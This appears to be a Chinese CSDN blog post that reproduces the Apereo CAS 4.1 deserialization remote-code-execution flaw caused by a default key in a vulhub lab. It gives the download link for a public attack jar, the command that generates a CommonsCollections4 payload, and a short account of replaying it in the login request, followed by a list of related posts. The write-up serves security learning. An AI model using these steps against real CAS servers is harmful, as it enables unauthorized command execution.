Apereo CAS 4.1 反序列化

最新推荐文章于 2023-12-27 10:45:46 发布
最新推荐文章于 2023-12-27 10:45:46 发布
阅读量405 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44912035/article/details/112077863
版权

漏洞背景

Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

漏洞复现

环境启动后,访问页面如图所示:
在这里插入图片描述
漏洞原理是Webflow中使用了默认密钥changeit:

下载地址:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "执行的命令"

在这里插入图片描述

在这里插入图片描述
替换掉他,并重放
在这里插入图片描述
进入靶机看到文件已成功创建
在这里插入图片描述

weixin_44912035
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反序列化漏洞利用工具_Apereo_CAS_反序列化漏洞分析及利用
weixin_39777540的博客
11-28 3548
Apereo CAS 是一个开源的统一认证服务(单点登录系统),CAS是Central Authentication Service的首字母缩写。根据网上公开的漏洞详情,影响版本为4.1.X和4.2.X,本文讲述从环境搭建、漏洞分析到漏洞利用CAS反序列化漏洞一、环境搭建1. 4.1.X环境从github上下载cas-overlay-template,命令gitclone-b4.1...
Apereo CAS 4.1 反序列化命令执行漏洞
Rin_CSDN
10-17 2222
登录CAS并抓改登录包,将execution替换成上面的Payload。经过测试,生成的payload可以直接利用,对目标不限制。
Apereo-cas 4.x反序列化漏洞复现
weixin_50464560的博客
12-07 2911
转载https://www.freebuf.com/vuls/226149.html 建议再查看https://xz.aliyun.com/t/7032#toc-7的放假前看到很多文章对这个漏洞进行分析复现,又因为过年期间的特殊情况,实在是无聊至极,所以自己也来学习一下,顺便恶补一下反序列化漏洞的知识。这篇文章记录了自己的一些想法以及相关的知识点,方便自己日后忘记可以重新拾起。第一次写文章有不好的,希望大家见谅。由于部分cas版本的加密函数不同有相应的变化,因此想要按照此文章来复现漏洞的话还是选择和我一样的
Apereo cas 密钥硬编码反序列化漏洞复现与利用
最新发布
weixin_54611959的博客
12-27 192
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实现该协议的软件包。单点登录定义单点登录(Single sign on),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
cas4.1.x集成 cas4.1.x集成
06-02
cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x集成cas4.1.x...
apereo cas6.3.2可执行war,集成mysql的jdbc认证模块
03-28
Apereo CAS 6.3.2 是一个广泛使用的开源单点登录(Single Sign-On, SSO)服务器,基于 Java 技术栈构建,特别适用于教育和企业环境。它提供了安全的身份验证和授权服务,允许用户通过单一登录界面访问多个应用程序。...
Apereo CAS5.2.3 示例代码
04-04
CAS系列博客配套demo:https://blog.csdn.net/u010588262/article/category/7548325 建议看一下Server配置的博客,资源里没有带依赖包不然太大了,博客里有说明怎么添加依赖 实现了mysql查询验证,restful api
cas4.1.x集成.zip
06-10
CAS 4.1.x版本中,这个框架进行了许多改进和增强,旨在提高安全性、稳定性和用户体验。下面我们将详细探讨CAS 4.1.x集成的相关知识点。 **一、CAS核心概念** 1. **单一登录(SSO)**:用户只需一次登录,就能...
cas-security-spring-boot-starter:用于Apereo CAS客户端的Spring Boot Starter与Spring Security完全集成
01-30
Spring Security CAS启动器 一个Spring Boot Starter,它将帮助您在应用程序安全上下文中配置 。 产品特点 Spring Boot 1和2支持 配置CAS身份验证和授权 支持基于当前HttpServletRequest动态服务解析 通过高级配置 ...
Apereo CAS5.2.3.0 示例代码
08-03
CAS系列博客配套demo:https://blog.csdn.net/u010588262/article/category/7548325 建议看一下Server配置的博客,资源里没有带依赖包不然太大了,博客里有说明怎么添加依赖 实现了mysql查询验证,restful api
Apereo CAS 4.1 反序列化漏洞
黑白的博客
12-21 1186
声明 好好学习,天天向上 漏洞描述 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 影响范围 Apereo CAS <= 4.1.7 复现过程 这里使用4.1.5版本 使用vulhub cd /app/vulhub-master/apereo-cas/4.1-rce 使用docker启动 docker-compose build doc
五分钟复现apereo-cas反序列化命令执行
liaowang321的博客
03-21 3427
五分钟复现apereo-cas反序列化命令执行一、漏洞成因二、攻击思路三、漏洞复现四、反弹shell五、修复建议 一、漏洞成因 pereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 参考链接:https://apereo.github.io/2016/04/08/commonsvulndisc/ 漏洞原理实际上是Webflow中使用了默认密钥chang
vulhub漏洞复现系列之Apereo CAS 4.X反序列化漏洞
weixin_43071873的博客
12-08 759
昨天复现的时候,同事看到了我在复现这个cas,他和我说现在企业用的都是5.x、6.x的了,4.x已经很少了,但没办法还得了解一下。他还说要想真正了解cas单点登录,要自己搭一遍这个系统,了解整个的架构,踩过了那些坑才能真正吃透,苦于最近确实时间不太够,就先留着以后学习吧。 漏洞简介:Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 影响范围:4
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞
qq_51577576的博客
10-24 1276
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞 Apereo CAS 是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞(硬编码导致的漏洞),进而执行任意命令。
Apereo-cas 4.1 反序列化 RCE 漏洞
菜鸟的学习笔记
06-28 991
Apereo-cas 4.1 反序列化 RCE 漏洞 一. 环境搭建 使用vulhub提供的文件创建漏洞复现环境 运行后将监听8080端口,访问http://your-ip:8080/cas/login查看登录页面。 二. Exploit 4.1.7 之前 Apereo CAS 的开箱即用默认配置使用默认密钥changeit: public class EncryptedTranscoder implements Transcoder { private CipherBean cipherBe
Apereo CAS 反序列化漏洞
热门推荐
公众号shadow sock7
03-18 1万+
下载cas-4.1.5 放到tomcat的webapps目录下,自动解压。 运行成功之后返回登陆页面: 登陆的接口发现有一个execution参数: 直接base64并没有得到有意义的字符: 在这里: org/springframework/webflow/mvc/servlet/FlowHandlerAdapter#handle开始处理, 对于没有execution(GET login页面...
Apereo-CAS 4.1.x反序列化远程代码执行漏洞复现
afei001
03-31 560
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Vulhub搭建漏洞环境 5.2 Apereo-CAS-Attack利用 6.漏洞修复 6.1 缓解措施 6.2 补丁升级 1.漏洞概述 Apereo CASApereo发布的集中认证服务平台,常被用于企业内部单点登录系统。CAS试图成为满足身份验证和授权需求的综合平台。CAS是一个开源且有据可查的身份验证协议。协议的主要实现是此处托管的具有相同名称的开源Java服务器组件,并支...
CAS云桌面虚拟化搭建完全指南
"CAS云桌面虚拟化操作手册详细介绍了如何在测试环境中搭建CAS云桌面虚拟化系统,由重庆紫光华山智安科技有限公司的信息技术中心罗绍元编撰。手册涵盖从安装虚拟化主机、配置CAS系统到操作CAS后台、创建虚拟机以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值